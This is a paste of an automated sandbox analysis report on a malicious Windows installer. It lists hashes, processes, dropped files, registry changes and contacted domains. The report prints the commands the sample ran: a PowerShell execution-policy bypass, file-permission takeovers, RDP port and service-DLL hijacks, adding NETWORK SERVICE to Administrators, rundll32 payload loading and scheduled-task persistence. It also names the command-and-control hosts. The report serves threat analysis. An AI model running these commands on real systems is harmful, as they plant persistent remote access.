paladin316

b548e1df__exe_2019-08-02_22_30.txt

Aug 2nd, 2019
2,233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.87 KB | None | 0 0
  1.  
  2. * MalFamily: ""
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "b548e1df..exe"
  7. * File Size: 3035258
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
  9. * SHA256: "816a093d5242c973a9000051328b95851a5fbf2cfb3c074423c023b35ad963fb"
  10. * MD5: "239c606e21e3bd309df94221eb3cb68d"
  11. * SHA1: "5b547b1fdca9e8420d6e1fcf13e4f61504a3f046"
  12. * SHA512: "3ba0065507dbefa37eddd727f8c267e94b6b20f5cd7efa615df9800c17824fa6f4c3721b7be2edc2832e2309fe382c5446f3f62f8a813241929576d47a77ce75"
  13. * CRC32: "6E9F40F8"
  14. * SSDEEP: "49152:2gxhbBonjyatyorA/spFtVxafjCQRz84rYq53/o2qrl2KEa+n2ESPBtl:22rmjyaUorA/2NOjCQbrnFo2qrl/Ea+o"
  15.  
  16. * Process Execution:
  17. "b548e1df..exe",
  18. "cmd.exe",
  19. "powershell.exe",
  20. "takeown.exe",
  21. "icacls.exe",
  22. "icacls.exe",
  23. "icacls.exe",
  24. "icacls.exe",
  25. "icacls.exe",
  26. "icacls.exe",
  27. "icacls.exe",
  28. "reg.exe",
  29. "reg.exe",
  30. "net.exe",
  31. "net1.exe",
  32. "cmd.exe",
  33. "cmd.exe",
  34. "services.exe",
  35. "svchost.exe",
  36. "WmiPrvSE.exe",
  37. "svchost.exe",
  38. "cmd.exe",
  39. "rundll32.exe",
  40. "taskhost.exe",
  41. "svchost.exe",
  42. "sc.exe",
  43. "taskhost.exe",
  44. "svchost.exe",
  45. "WerFault.exe",
  46. "svchost.exe",
  47. "svchost.exe",
  48. "rundll32.exe",
  49. "cmd.exe",
  50. "rundll32.exe"
  51.  
  52.  
  53. * Executed Commands:
  54. "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  55. "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  56. "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
  57. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
  58. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
  59. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
  60. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
  61. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
  62. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
  63. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
  64. "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
  65. "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\tmp5211.dat /f",
  66. "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  67. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
  68. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
  69. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  70. "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  71. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  72. "taskhost.exe $(Arg0)",
  73. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  74. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  75. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  76. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  77. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  78. "cmd.exe /c rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  79. "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
  80. "rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  81. "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
  82. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
  83. "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
  84. "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  85.  
  86.  
  87. * Signatures Detected:
  88.  
  89. "Description": "At least one process apparently crashed during execution",
  90. "Details":
  91.  
  92.  
  93. "Description": "Attempts to connect to a dead IP:Port (4 unique times)",
  94. "Details":
  95.  
  96. "IP": "185.225.17.150:80"
  97.  
  98.  
  99. "IP": "192.35.177.64:80"
  100.  
  101.  
  102. "IP": "184.28.188.218:80"
  103.  
  104.  
  105. "IP": "94.158.245.123:443"
  106.  
  107.  
  108.  
  109.  
  110. "Description": "Creates RWX memory",
  111. "Details":
  112.  
  113.  
  114. "Description": "Possible date expiration check, exits too soon after checking local time",
  115. "Details":
  116.  
  117. "process": "cmd.exe, PID 2948"
  118.  
  119.  
  120.  
  121.  
  122. "Description": "A process attempted to delay the analysis task.",
  123. "Details":
  124.  
  125. "Process": "svchost.exe tried to sleep 1381 seconds, actually delayed analysis time by 0 seconds"
  126.  
  127.  
  128. "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  129.  
  130.  
  131.  
  132.  
  133. "Description": "Loads a driver",
  134. "Details":
  135.  
  136. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  137.  
  138.  
  139.  
  140.  
  141. "Description": "Expresses interest in specific running processes",
  142. "Details":
  143.  
  144. "process": "rundll32.exe"
  145.  
  146.  
  147. "process": "winlogon.exe"
  148.  
  149.  
  150. "process": "explorer.exe"
  151.  
  152.  
  153.  
  154.  
  155. "Description": "Reads data out of its own binary image",
  156. "Details":
  157.  
  158. "self_read": "process: b548e1df..exe, pid: 1944, offset: 0x00000000, length: 0x002e5076"
  159.  
  160.  
  161. "self_read": "process: b548e1df..exe, pid: 1944, offset: 0x00008c1c, length: 0x002dc45e"
  162.  
  163.  
  164.  
  165.  
  166. "Description": "A process created a hidden window",
  167. "Details":
  168.  
  169. "Process": "b548e1df..exe -> \"C:\\Windows\\system32\\cmd.exe\""
  170.  
  171.  
  172. "Process": "rundll32.exe -> cmd.exe"
  173.  
  174.  
  175. "Process": "rundll32.exe -> cmd.exe"
  176.  
  177.  
  178.  
  179.  
  180. "Description": "Performs some HTTP requests",
  181. "Details":
  182.  
  183. "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  184.  
  185.  
  186. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  187.  
  188.  
  189. "url": "http://kuarela.xyz/2.txt"
  190.  
  191.  
  192.  
  193.  
  194. "Description": "Deletes its original binary from disk",
  195. "Details":
  196.  
  197.  
  198. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  199. "Details":
  200.  
  201. "Process": "svchost.exe (2660)"
  202.  
  203.  
  204.  
  205.  
  206. "Description": "Attempts to stop active services",
  207. "Details":
  208.  
  209. "servicename": "UmRdpService"
  210.  
  211.  
  212.  
  213.  
  214. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  215. "Details":
  216.  
  217. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9026716 times"
  218.  
  219.  
  220.  
  221.  
  222. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  223. "Details":
  224.  
  225. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  226.  
  227.  
  228.  
  229.  
  230. "Description": "Installs itself for autorun at Windows startup",
  231. "Details":
  232.  
  233. "service name": "SvcHlies33"
  234.  
  235.  
  236. "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
  237.  
  238.  
  239. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath"
  240.  
  241.  
  242. "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
  243.  
  244.  
  245. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
  246.  
  247.  
  248. "data": "%SystemRoot%\\help\\tmp5211.dat"
  249.  
  250.  
  251. "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  252.  
  253.  
  254.  
  255.  
  256. "Description": "Creates a hidden or system file",
  257. "Details":
  258.  
  259. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP"
  260.  
  261.  
  262. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
  263.  
  264.  
  265. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
  266.  
  267.  
  268. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
  269.  
  270.  
  271. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
  272.  
  273.  
  274. "file": "C:\\Windows\\Temp\\client32.exe"
  275.  
  276.  
  277. "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
  278.  
  279.  
  280. "file": "C:\\Windows\\Temp\\msvcr100.dll"
  281.  
  282.  
  283. "file": "C:\\Windows\\Temp\\nskbfltr.inf"
  284.  
  285.  
  286. "file": "C:\\Windows\\Temp\\NSM.ini"
  287.  
  288.  
  289. "file": "C:\\Windows\\Temp\\NSM.LIC"
  290.  
  291.  
  292. "file": "C:\\Windows\\Temp\\pcicapi.dll"
  293.  
  294.  
  295. "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
  296.  
  297.  
  298. "file": "C:\\Windows\\Temp\\PCICL32.DLL"
  299.  
  300.  
  301. "file": "C:\\Windows\\Temp\\remcmdstub.exe"
  302.  
  303.  
  304. "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
  305.  
  306.  
  307.  
  308.  
  309. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  310. "Details":
  311.  
  312.  
  313. "Description": "Attempts to create or modify system certificates",
  314. "Details":
  315.  
  316.  
  317.  
  318. * Started Service:
  319. "TermService",
  320. "WerSvc",
  321. "UmRdpService",
  322. "W32Time",
  323. "SvcHlies33"
  324.  
  325.  
  326. * Mutexes:
  327. "Global\\CLR_CASOFF_MUTEX",
  328. "TSLicensingLock",
  329. "Local\\WERReportingForProcess2776",
  330. "Global\\\\xe5\\x88\\x90\\xc2\\x8f"
  331.  
  332.  
  333. * Modified Files:
  334. "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  335. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
  336. "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\System.dll",
  337. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  338. "\\??\\PIPE\\srvsvc",
  339. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LAWERZYQZ6MNMX729YVD.temp",
  340. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP",
  341. "C:\\Windows\\Help\\tmp5211.dat",
  342. "C:\\Windows\\Help\\tmp5212.dat",
  343. "C:\\Windows\\Help\\tmp5213.dat",
  344. "C:\\Windows\\sysnative\\rfxvmt.dll",
  345. "C:\\Windows\\inf\\setupapi.dev.log",
  346. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  347. "\\??\\PIPE\\samr",
  348. "\\??\\PIPE\\lsarpc",
  349. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  350. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  351. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  352. "C:\\Windows\\sysnative\\LogFiles\\Scm\\0096502d-e5a8-4303-a737-cba2a8ba171e",
  353. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\asogaigsaug.dat",
  354. "C:\\Windows\\Help\\10278.ps1",
  355. "\\Device\\Termdd",
  356. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
  357. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  358. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  359. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
  360. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
  361. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\CabEB8.tmp",
  362. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\TarEB9.tmp",
  363. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep706.bin",
  364. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep704.zip",
  365. "C:\\Windows\\Temp\\client32.exe",
  366. "C:\\Windows\\Temp\\client32.ini",
  367. "C:\\Windows\\Temp\\HTCTL32.DLL",
  368. "C:\\Windows\\Temp\\msvcr100.dll",
  369. "C:\\Windows\\Temp\\nskbfltr.inf",
  370. "C:\\Windows\\Temp\\NSM.ini",
  371. "C:\\Windows\\Temp\\NSM.LIC",
  372. "C:\\Windows\\Temp\\pcicapi.dll",
  373. "C:\\Windows\\Temp\\PCICHEK.DLL",
  374. "C:\\Windows\\Temp\\PCICL32.DLL",
  375. "C:\\Windows\\Temp\\remcmdstub.exe",
  376. "C:\\Windows\\Temp\\TCCTL32.DLL",
  377. "C:\\Windows\\Temp\\cksini.exe",
  378. "C:\\Windows\\Temp\\updsvc.exe",
  379. "\\Device\\RdpDr",
  380. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  381. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp.appcompat.txt",
  382. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp.WERInternalMetadata.xml",
  383. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp.hdmp",
  384. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp.mdmp",
  385. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER4623.tmp.appcompat.txt",
  386. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER4D39.tmp.WERInternalMetadata.xml",
  387. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WER50D4.tmp.hdmp",
  388. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\WERE5B2.tmp.mdmp",
  389. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_a8bcd9cebc267533cfbc8132deab282e9c9ceb7_cab_076dd36d\\Report.wer"
  390.  
  391.  
  392. * Deleted Files:
  393. "C:\\Users\\user\\AppData\\Local\\Temp\\nsx65A1.tmp",
  394. "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp",
  395. "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\System.dll",
  396. "C:\\Users\\user\\AppData\\Local\\Temp\\nsn67D4.tmp\\",
  397. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF13b03ad.TMP",
  398. "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  399. "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe",
  400. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\CabEB8.tmp",
  401. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\TarEB9.tmp",
  402. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep706.bin",
  403. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep704.zip",
  404. "C:\\Windows\\Temp\\client32.exe",
  405. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
  406. "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
  407. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp",
  408. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4623.tmp.appcompat.txt",
  409. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp",
  410. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER4D39.tmp.WERInternalMetadata.xml",
  411. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp",
  412. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER50D4.tmp.hdmp",
  413. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp",
  414. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE5B2.tmp.mdmp"
  415.  
  416.  
  417. * Modified Registry Keys:
  418. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  419. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  420. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  421. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  422. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  423. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  424. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  425. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  426. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  427. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  428. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  429. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  430. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
  431. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
  432. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  433. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  434. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  435. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33",
  436. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Type",
  437. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Start",
  438. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ErrorControl",
  439. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath",
  440. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\DisplayName",
  441. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ObjectName",
  442. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  443. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
  444. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
  445. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  446. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  447. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  448. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  449. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
  450. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
  451. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  452. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  453. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  454. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  455. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  456. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
  457. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  458. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  459. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining"
  460.  
  461.  
  462. * Deleted Registry Keys:
  463. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
  464. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13"
  465.  
  466.  
  467. * DNS Communications:
  468.  
  469. "type": "A",
  470. "request": "fdguyt5ggs.xyz",
  471. "answers":
  472.  
  473. "data": "94.158.245.123",
  474. "type": "A"
  475.  
  476.  
  477.  
  478.  
  479. "type": "A",
  480. "request": "apps.identrust.com",
  481. "answers":
  482.  
  483. "data": "192.35.177.64",
  484. "type": "A"
  485.  
  486.  
  487. "data": "apps.digsigtrust.com",
  488. "type": "CNAME"
  489.  
  490.  
  491.  
  492.  
  493. "type": "A",
  494. "request": "kuarela.xyz",
  495. "answers":
  496.  
  497. "data": "185.225.17.150",
  498. "type": "A"
  499.  
  500.  
  501.  
  502.  
  503.  
  504. * Domains:
  505.  
  506. "ip": "94.158.245.123",
  507. "domain": "fdguyt5ggs.xyz"
  508.  
  509.  
  510. "ip": "185.225.17.150",
  511. "domain": "kuarela.xyz"
  512.  
  513.  
  514. "ip": "192.35.177.64",
  515. "domain": "apps.identrust.com"
  516.  
  517.  
  518.  
  519. * Network Communication - ICMP:
  520.  
  521. * Network Communication - HTTP:
  522.  
  523. "count": 1,
  524. "body": "",
  525. "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
  526. "user-agent": "Microsoft-CryptoAPI/6.1",
  527. "method": "GET",
  528. "host": "apps.identrust.com",
  529. "version": "1.1",
  530. "path": "/roots/dstrootcax3.p7c",
  531. "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
  532. "port": 80
  533.  
  534.  
  535. "count": 1,
  536. "body": "",
  537. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  538. "user-agent": "Microsoft-CryptoAPI/6.1",
  539. "method": "GET",
  540. "host": "www.download.windowsupdate.com",
  541. "version": "1.1",
  542. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  543. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 88273\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  544. "port": 80
  545.  
  546.  
  547. "count": 1,
  548. "body": "",
  549. "uri": "http://kuarela.xyz/2.txt",
  550. "user-agent": "Embarcadero URI Client/1.0",
  551. "method": "GET",
  552. "host": "kuarela.xyz",
  553. "version": "1.1",
  554. "path": "/2.txt",
  555. "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: kuarela.xyz\r\n\r\n",
  556. "port": 80
  557.  
  558.  
  559.  
  560. * Network Communication - SMTP:
  561.  
  562. * Network Communication - Hosts:
  563.  
  564. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment